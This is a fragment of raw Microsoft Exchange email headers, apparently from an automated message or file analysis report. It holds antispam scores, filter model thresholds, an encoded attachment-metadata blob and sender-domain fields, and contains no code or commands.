                                                                X-Microsoft-Antispam-Message-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
                                                                X-Forefront-Antispam-ReportCIP:40.107.247.116; CTRY:NL; LANG:en; SCL:1; SRV:; IPV:NLI; SFV:NSPM; H:EUR02-AM0-obe.outbound.protection.outlook.com; PTR:mail-am0eur02on2116.outbound.protection.outlook.com; CAT:NONE; SFTY:9.25; SFS:(13230040)(4073199012)(35042699022)(12062699021)(22003199012)(5073199012)(5063199012)(4076899003)(8096899003); DIR:INB; SFTY:9.25;
                                                                X-MS-Exchange-Organization-GroupForkPerfVCL=0;VL=0
                                                                X-MS-Exchange-Forest-Languageen
                                                                X-MS-Exchange-Forest-IndexAgent-0AQ0CZW4BH80DW3sNCiAgImluZGV4IjogMCwNCiAgIkF0dGFjaG1lbn RQcm9wZXJ0aWVzIjogew0KICAgICJleHRlbnNpb24iOiAicG5nIiwN CiAgICAidXJscyI6IFtdLA0KICAgICJpbm5lckZpbGVzIjogW10sDQ ogICAgImRldGVjdGVkRm9ybWF0IjogInBuZyIsDQogICAgIm5hbWUi OiAiamVtaW5pcXcyIiwNCiAgICAidHlwZSI6ICJTdHJlYW1BdHRhY2 htZW50IiwNCiAgICAiZnJvbUNhY2hlIjogZmFsc2UNCiAgfQ0KfSwN CnsNCiAgImluZGV4IjogMSwNCiAgIkF0dGFjaG1lbnRQcm9wZXJ0aW VzIjogew0KICAgICJleHRlbnNpb24iOiAicGRmIiwNCiAgICAidXJs cyI6IFtdLA0KICAgICJpbm5lckZpbGVzIjogW10sDQogICAgImRldG VjdGVkRm9ybWF0IjogbnVsbCwNCiAgICAibmFtZSI6ICJpbGlsIiwN CiAgICAidHlwZSI6ICJTdHJlYW1BdHRhY2htZW50IiwNCiAgICAiZn JvbUNhY2hlIjogZmFsc2UNCiAgfQ0KfV0AAYkFAAAPAAADH4sIAAAA AAAEAL1Va28bRRSd9dubuO0nkMqXK5BQKjmtH0lKTIRqpUkblKRVkg Ll22R3nJ12H2ZnnNR8QPwH/iE/gV/AmZn1pjQmKghRbZ153Hvn3HPO zv5xt+NvbvQ2Nzr+a6Ho919/o+f8UlCaacpFIOSlCEkoLROuxUM6i3 j6VtHuPA3lw45vpzTPZt2O/20WpXREz0WeJzxNO/7p3sl3B7t7dDQ+ Hj/bO+n4z2Uc00EoeCy4El06PNzt+I83eutbw+H6sNfvr72YTGQgHm B1sLG+Oeyv9/vbm2u7Io4fXEcO+hu9tX3+DkvrN/51/P08S0YOIR1x fTnntBMkdvBERTzJs+DtTMtY6rnOuYxF/jDIkm+AV6R6RN+LMBUq5P Musuc07NKgNxhSvz/qD2l8hJ6zEdleF53SzpuoGD6J0KJcdFjU3Q1G dCKDiOchnYgZIgTt5LkbLcn4mg6l4vTjlRQK6Ggn/rkYLi1/Ojt/Iw IgP9kb0cHTvfHh3vh0j4aDwTYQP8Kg/1Vvq+O/SqUuJiQVyZR0JEhF 2fRhsflFkWNM8FSGRlcSl0BwITRx+mmWaUGTLEciCmQpJDwgJURKSL 7iipTmuYZfzmea4iyDUWL5VthzpthRdCVyDLGbpSb3yhgiMnZDSGKP saVD1Kbx6fjl+xajX4inISUcFaXBc5ELrglKIep9uY2S+SV8ROMwka lUkFkD9Zc0DoJslgLHiXU2P48FggtP0CtnCjpzrlBAmAZ4O3o9Os5y HdEuDAI2xpcinaH3Y3FFp5qn2jTzckz9za3HA2fd7cEm/vd617Ot7e 1t2h//sPDnP3LQ7c7sjTavnfkvfP9/+fMWbz7LMiib5alML4oWjAnh ENALQ+mMgkhAI+MAOM5ZV3M9gw8ndjaDg9WisgkrrH4lSoflzr3n2T tcbVMuc/XfXGE7asoRvPvieB89Hp8djA8Pzl7T8Ysz5I5wZwoKMvRh nGfRwuIigQSUCKX4hbB4eTonrjUPosRGcsCVJisEASqLRTwvXj7Eh2 GOVCHW1IPirZjbMzhea/ydQIRUSx53aZpn01wKvJlzE/kIFTC/hP4X qCtTlIRJZJaWdc4FYZPHOA/JGtohcALXUihVEGdqluNLcDCxL6VBab 4VQNXxS7j4csipBISy30WnrgGZEyap7pq5/CAkwk1ybm6VRZdWf3MY moM0WY6uLP8kk0SEEl8mYIUkuXbGMCCg89zIjB3HtWkPuymFIhZa/P XMpQK4hKKIJQAgclJzpUXysQx0yyBjQGBCrJxI01SE68scek1rl2bG VVhQAleX1aULQadzvBiWLIWbzPJ4k1fj//fxS3Mh5zLQTshInksoCc t7lTpjddasskaN1aus1mLtFvMbrFlnrTpruHWPVbDYZK0ma2PaZitV D8Gs6rFVr2YHtRpj2Gp47aXrNa+5dL3K7tdYAwc1UNxjn7PWJ+xTe2 jDnsJW8LCax6o1r95iDDAqDLkY+22Pfcb8DruDeCw6eC2P3Wdtt3gz DAGIbHtokAGq+WUtVLaDZoVV8VRN/WbNa9hFtFOzK4Yc8GA5cVNDCw YuBafjt76gsRxUbJZhwD4u1z5NR69bqRhuXPEFG6zVYfcgh89W8Ysp eilot/UBuGEPNU15VaPjUpK9xt8wDwxLKLqd+ZtKfTzzH9LO6k3jMe RVHPmOW/e4FdNpIUQTyEuZkFsGN5l/m1FtR3fZPcdVyxigSHeS4Vlh q27LnGJX2sz37OlO2VV2x8Ug12crbuym2EUwCkKmyiLFPmCg3TakVV 2nrsH6wmZu0anvwlzBupG1iSNcgyUzpfGwUuaW4EvL2YDWMiQrJbEt Sw7Gvsmtd9hd+15UHcgSrSuOgTHhn6i7u0MdDAAA
                                                                X-MS-Exchange-Forest-IndexAgent1 1893
                                                                X-MS-Exchange-Forest-EmailMessageHash68D071B1,2043FC0C,00000000
                                                                X-MS-Exchange-Organization-RoutingMessageBlockingAgent-Checkedtrue
                                                                X-MS-Exchange-Organization-FeatureTableV2{255:11, 256:11, 261:10, 262:10, 341:3, 342:0, 343:1, 344:0, 345:1, 346:0, 347:3, 348:0, 349:1, 350:0, 351:1, 352:0, 353:14, 354:7, 355:13, 356:6, 357:33, 358:8, 382:"173.195.100.199", 383:"cloudfare.com", 384:"generous-minds.com", 385:"generous-minds.com", 386:"True", 387:"True", 421:48, 422:0, 423:48, 424:0, 425:75, 426:7, 427:75, 428:7, 429:89, 430:7, 452:1, 453:1, 454:"40FCF4D@montrose-env.com", 455:"NEI", 457:429, 458:63, 459:217, 460:1671277, 461:209, 462:1231801, 463:209, 464:1231801, 501:1, 502:1, 503:1, 504:1, 506:1, 507:1, 508:"generousminds.onmicrosoft.com", 509:"generous-minds.com", 510:"generous-minds.com", 511:"pass", 512:100, 603:0, 604:0, 651:2, 653:1, 668:0, 669:15, 723:1, 738:1, 739:1, 740:1, 741:1, 742:3, 743:7, 744:1, 749:"Latn", 756:0, 757:0, 758:"ECDDD03C.C32ADC8.EDCB32E.C4EB922A.201AB",824:17,825:2,827:13,832:9,833:2,834:1,844:1,845:0,848:"20101999007",951:36,952:1623,954:2684,964:92,965:51,966:546,967:37,968:2830,973:20,1010:0,1011:"EDAFD3BE; ",1028:5844,1029:5502,1030:23,1031:341,1032:5844,1033:5502,1034:23,1035:341,1036:"8075",1051:-1,1052:-1,1053:-1,1054:-1,1229:"1",1230:"0",1231:"SectionFuzzyEqual",1232:"Voice",1401:0,1402:0,1403:0,1404:0,1405:0,1406:0,1407:845,1408:901,1409:2598,1410:2676,1411:2598,1412:2676,1413:8,1414:6621897,1417:9,1418:430146155,1423:24,1424:23615729263,2501:0,2502:0,2503:0,2504:0,2505:0,2506:0,2507:0,2508:0,2509:0,2510:0,2511:0,2512:0,2513:0,2514:0,2515:0,2516:0,2517:0,2518:0,2519:0,2520:0,2521:0,2522:0,2523:0,2524:0,2525:0,2526:0,2527:0,2528:0, 2529:0, 2530:0, 2531:0, 2532:0, 2533:0, 2534:0, 2535:0, 2536:0, 2537:0, 2538:0, 2539:0, 2683:555, 2684:446, 2685:538, 2686:446, 2687:538, 2747:-24748, 2753:1, 2760:1, 2769:0, 2770:0, 2771:0, 2772:15, 2773:429, 2774:255, 2775:7, 2776:90, 2777:255, 2778:7, 2779:90, 2780:1005415, 2781:1005415, 2782:0, 2783:16, 2784:271, 2785:8, 2786:109, 2787:1339222, 2788:63, 2801:8, 2802:35, 2803:44, 2804:15679077391, 2805:15, 2806:8, 2807:15, 2808:7, 2809:18, 2810:248354939, 2811:20, 2812:3728208, 2813:0, 2814:0, 2815:0, 2816:0, 2817:0, 2818:0, 2819:0, 2820:1275, 2821:1275, 2822:0, 2823:0, 2824:395, 2825:0, 2830:0, 2831:0, 2832:0, 2833:0, 2834:0, 2835:0, 2836:1353, 2837:1353, 2842:0, 2843:0, 2844:451, 2909:10, 2910:10, 2911:11, 2912:11, 2913:-1, 2914:-1, 2915:-1, 2916:-1, 2917:-1, 2918:-1, 2924:"CorrectlyConfigured",3083:"3.99",3084:"3.11",3086:124,3088:14,3089:385,3096:"3.99",3099:2,3100:13,3101:1,3102:5,3118:"div:7; p:70; a:6; img:1; br:9; b:21; html:1; head:1; meta:3; style:1; body:1; o_p:44; span:41; strong:1",3120:1,3121:1,3124:"0.241",3145:"centene.com",3148:"account"}
                                                                X-MS-Exchange-Organization-ATPSafeLinks-MsgData{"IsUrlBeingScanned":"", "UrlWriteTime":"11/15/2024 6:28:42 PM","ASDirectionality":"1","PhishEdu":"0","MsgScanSuspicionLevel":"0"}
                                                                X-MS-Exchange-Organization-Antispam-SafelinksWrappingInMDFATrue
                                                                X-MS-Exchange-Organization-Cross-Session-Cache03Ptl2FprThreshold=; SRESV_Ptl3FprThreshold=; SRESV_Ptl4FprThreshold=; BKEMB_ModelName=; BKEMB_VerdictVersion=; BKEMB_P2BCLFprThreshold=; BKEMB_NonP2BCLFprThreshold=; BKEMS_FprThreshold=; CLEPV_ModelName=; CLEPV_VerdictVersion=; CLEPV_HCPhishFprThreshold=; CLEPV_LCPhishFprThreshold=; SAEPV_ModelName=; SAEPV_VerdictVersion=; SUEPV_ModelName=SUEPV; SUEPV_VerdictVersion=; UESELV3_ModelName=; UESELV3_VerdictVersion=; BMCSV_ModelName=; BMCSV_VerdictVersion=; BMCSV_FprThreshold=; BKCMB_ModelName=; BKCMB_VerdictVersion=; BKCMB_FprThreshold=; BKCMS_FprThreshold=; SPCPV_ModelName=; SPCPV_VerdictVersion=; SPCPV_FprThreshold=; M3CSV_ModelName=; M3CSV_VerdictVersion=; M3CSV_FprThreshold=; M3CSV_FC_FprThreshold=; SRCSV_ModelName=SDRCB; SRCSV_VerdictVersion=2; UCSELV3_ModelName=; UCSELV3_VerdictVersion=; BMHPV_ModelName=; BMHPV_VerdictVersion=; BMHPV_Ptl1FprThreshold=; BMHPV_Ptl2FprThreshold=; BMHPV_Ptl3FprThreshold=; BMHPV_Ptl4FprThreshold=; M3HPV_ModelName=; M3HPV_VerdictVersion=; M3HPV_Ptl1FprThreshold=; M3HPV_Ptl2FprThreshold=; M3HPV_Ptl3FprThreshold=; M3HPV_Ptl4FprThreshold=; M3HSV_ModelName=; M3HSV_VerdictVersion=; M3HSV_Ptl1FprThreshold=; M3HSV_Ptl1FprThreshold_FC=; M3HSV_Ptl2FprThreshold=; M3HSV_Ptl2FprThreshold_FC=; M3HSV_Ptl3FprThreshold=; M3HSV_Ptl3FprThreshold_FC=; M3HSV_Ptl4FprThreshold=; M3HSV_Ptl4FprThreshold_FC=; BMEPV_ModelName=BPMV3; BMEPV_VerdictVersion=1; BMEPV_Ptl1FprThreshold=12; BMEPV_Ptl2FprThreshold=11; BMEPV_Ptl3FprThreshold=11; BMEPV_Ptl4FprThreshold=9; SRCSV_FprThreshold=240; CrossModelsConfigDestination=; CLEPV_FP=8; CLEPV=8; M3EPV_FP=51; M3EPV=51; M3ESV_FP=546; M3ESV=546; M3EIV_FP=92; M3HPV_FP=37; M3HPV=37; M3HSV_FP=2451; BMESV_FP=2684; BMESV=2684; BMHPV_FP=36; BMHPV=36; BKEMB_FP=-2; BKEMS_FP=10000; SUEPV_FP=521; SAEPV_FP=294; ATCHF_DBG=SKPD:11; FSC=15; FSCID=9301044456; ASC=0; FFV=NSPM; FFV_CL=1; FV=NSPM; FVS=Filters; FSCL=1; TAP_EP=; SFTY_FS=FC;SFTY=9.25;TIP_CULTURE=en-US
                                                                X-MS-Exchange-Organization-Processed-By-Gcc-JournalingJournal Agent
                                                                customermontrose

                                                                File Icon

                                                                Icon Hash:46070c0a8e0c67d6